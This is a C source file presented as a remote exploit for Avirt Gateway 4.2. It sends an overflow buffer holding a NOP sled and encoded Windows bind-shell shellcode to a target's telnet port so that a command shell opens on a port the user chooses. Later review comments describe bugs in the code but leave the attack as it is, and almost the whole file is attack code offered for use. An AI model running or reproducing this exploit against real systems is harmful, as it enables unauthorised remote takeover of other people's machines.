/* agate.c by uid0x00
* Avirt Gateway 4.2 remote exploit
* compile with gcc agate.c -o agate
*
* thx to ByteRage, exploit is based on his shellcode
*
*Disclaimer:
*Use of this information constitutes acceptance for use in an AS IS condition. There are
*NO warranties with regard to this information. In no event shall the author
*be liable for any damages whatsoever arising out of or in connection with
*the use or spread of this information. Any use of this information is at the
*user's own risk.
*/
/* Set the following three defines according to the DLL we use */
// MSVCRT.DLL version 6.10.8924.0 (win2K)
#define LoadLibraryRefNEG "\x30\xCF\xFC\x87"
#define GetProcAddressRefADD "\xFC"
#define newEIP "\x60\x32\xFA\x74" // Should JMP/CALL EBX
#include <stdio.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
/*
 * Entry point. Builds a 1024-byte buffer from the embedded `shellcode`
 * array, opens a TCP connection to argv[1] on port 23 and writes the whole
 * buffer to it. argv[2] is the port number patched into the payload.
 *
 * NOTE(review): memset/memcpy (<string.h>), atoi (<stdlib.h>), inet_addr
 * (<arpa/inet.h>) and sleep/close (<unistd.h>) are used without their
 * headers; the build relies on implicit declarations.
 *
 * Returns 0 on the usage and connect-failure paths; the success path falls
 * off the end of main without an explicit return.
 */
int main(int argc, char *argv[]) {
int s;                          /* socket descriptor */
struct sockaddr_in SockAdr;     /* target address (argv[1], TCP port 23) */
char exploit[1024];             /* send buffer; sizeof(exploit) bytes are sent below */
unsigned short int a_port;      /* port from argv[2], network byte order, XOR-masked */
char shellcode[] =
/* ==== SHELLC0DE START ==== */
/* shellcode based on ByteRage's 450byte code */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x06\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xEB\x06\x90\x90"newEIP"\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE8\xFF\xFF\xFF\xFF"
"\xC0\x5E\xAC\x84\xC0\x75\xFB\x8B\xFE\x33\xC9\xB1\xC1\x4E\x80\x36\x99\xE2\xFA\xBB"LoadLibraryRefNEG
"\xF7\xDB\x56\xFF\x13\x95\xAC\x84\xC0\x75\xFB\x56\x55\xFF\x53"GetProcAddressRefADD"\xAB\xAC"
"\x84\xC0\x75\xFB\xAC\x3C\x21\x74\xE7\x72\x03\x4E\xEB\xEB\x33\xED\x55\x6A\x01\x6A\x02\xFF"
"\x57\xE8\x93\x6A\x10\x56\x53\xFF\x57\xEC\x6A\x02\x53\xFF\x57\xF0\x33\xC0\x57\x50\xB0\x0C"
"\xAB\x58\xAB\x40\xAB\x5F\x55\x57\x56\xAD\x56\xFF\x57\xC0\x55\x57\xAD\x56\xAD\x56\xFF\x57"
"\xC0\xB0\x44\x89\x07\x57\xFF\x57\xC4\x8B\x46\xF4\x89\x47\x3C\x89\x47\x40\xAD\x89\x47\x38"
"\x33\xC0\x89\x47\x30\x66\xB8\x01\x01\x89\x47\x2C\x57\x57\x55\x55\x55\x6A\x01\x55\x55\x56"
"\x55\xFF\x57\xC8\xFF\x76\xF0\xFF\x57\xCC\xFF\x76\xFC\xFF\x57\xCC\x55\x55\x53\xFF\x57\xF4"
"\x93\x33\xC0\xB4\x04\x50\x6A\x40\xFF\x57\xD4\x96\x6A\x50\xFF\x57\xE0\x8B\xCD\xB5\x04\x55"
"\x55\x57\x51\x56\xFF\x77\xAF\xFF\x57\xD0\x8B\x0F\xE3\x18\x55\x57\x51\x56\xFF\x77\xAF\xFF"
"\x57\xDC\x0B\xC0\x74\x21\x55\xFF\x37\x56\x53\xFF\x57\xF8\xEB\xD0\x33\xC0\x50\xB4\x04\x50"
"\x56\x53\xFF\x57\xFC\x55\x57\x50\x56\xFF\x77\xB3\xFF\x57\xD8\xEB\xB9\xFF\x57\xE4\xD2\xDC"
"\xCB\xD7\xDC\xD5\xAA\xAB\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xF0\xE9\xFC\x99\xDE\xFC\xED\xCA"
"\xED\xF8\xEB\xED\xEC\xE9\xD0\xF7\xFF\xF6\xD8\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA"
"\xFC\xEA\xEA\xD8\x99\xDA\xF5\xF6\xEA\xFC\xD1\xF8\xF7\xFD\xF5\xFC\x99\xC9\xFC\xFC\xF2\xD7"
"\xF8\xF4\xFC\xFD\xC9\xF0\xE9\xFC\x99\xDE\xF5\xF6\xFB\xF8\xF5\xD8\xF5\xF5\xF6\xFA\x99\xCE"
"\xEB\xF0\xED\xFC\xDF\xF0\xF5\xFC\x99\xCB\xFC\xF8\xFD\xDF\xF0\xF5\xFC\x99\xCA\xF5\xFC\xFC"
"\xE9\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xB8\xCE\xCA\xD6\xDA\xD2\xAA\xAB"
"\x99\xEA\xF6\xFA\xF2\xFC\xED\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA"
"\xFA\xFC\xE9\xED\x99\xEA\xFC\xF7\xFD\x99\xEB\xFC\xFA\xEF\x99\x99\x9B\x99\x82\xA1\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xFA\xF4\xFD\x99\x0D\x0A";
/* ==== SHELLC0DE ENDS ==== */
printf("\nAvirt Gateway 4.2 remote exploit by uid0x00 (uid0x00@haked.com)\n\n");
/* Both positional arguments are required; no further validation of them. */
if(argc < 3) {
printf("usage:\t%s <ip#> <port#>\n", argv[0]);
return 0;
}
//insert shell port
/* atoi() gives no error indication; a non-numeric argv[2] silently becomes 0. */
a_port = htons(atoi(argv[2]));
/* Mask the port with 0x9999 and store its two bytes at fixed offsets 964/965. */
a_port^= 0x9999;
shellcode[964] = (a_port) & 0xff;
shellcode[965] = (a_port >> 8) & 0xff;
//init the exploit buffer
/* Only the first 0x200 (512) of the 1024 bytes are filled; send() below
 * transmits sizeof(exploit), so anything past the copied shellcode that the
 * memset did not reach is sent as uninitialised stack contents. */
memset(&exploit, '\xCC', 0x200);
/* &exploit / &shellcode are the arrays' own addresses; the copy excludes
 * the terminating NUL. */
memcpy(&exploit, &shellcode, sizeof(shellcode)-1);
printf("initialising socket\n");
s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
/* NOTE(review): socket() returns -1 on failure, which is truthy, so this
 * test only treats descriptor 0 as an error; a failed socket() call would
 * proceed to connect() on -1. */
if (s) {
printf("...initialized\n");
memset(&SockAdr, 0, sizeof(SockAdr));
/* inet_addr() returns INADDR_NONE for an unparsable address; not checked. */
SockAdr.sin_addr.s_addr = inet_addr(argv[1]);
SockAdr.sin_family = AF_INET;
SockAdr.sin_port = htons(23);   /* destination is fixed at TCP port 23 */
printf("trying to connect\n");
/* connect() returns 0 on success, hence the negation. */
if (!connect(s, (struct sockaddr *)&SockAdr, sizeof(SockAdr))) {
printf("...connected\n");
printf("(waiting)\n");
sleep(3);
printf("sending exploit\n");
/* Whole 1024-byte buffer in one call; the return value (short write or
 * error) is not checked. */
send(s, exploit, sizeof(exploit), 0);
printf("...sent\n");
printf("(waiting)\n");
sleep(3);
/* Printed unconditionally; nothing here verifies the remote outcome. */
printf("...closed\nshell bound to port %s \n", argv[2]);
close(s);
}
else {
/* connect() failed: report errno, release the descriptor. Exit status is
 * still 0, so a caller cannot distinguish this from the success path. */
printf("... failed :( errno = %i\n", errno);
close(s);
return(0);
}
}
}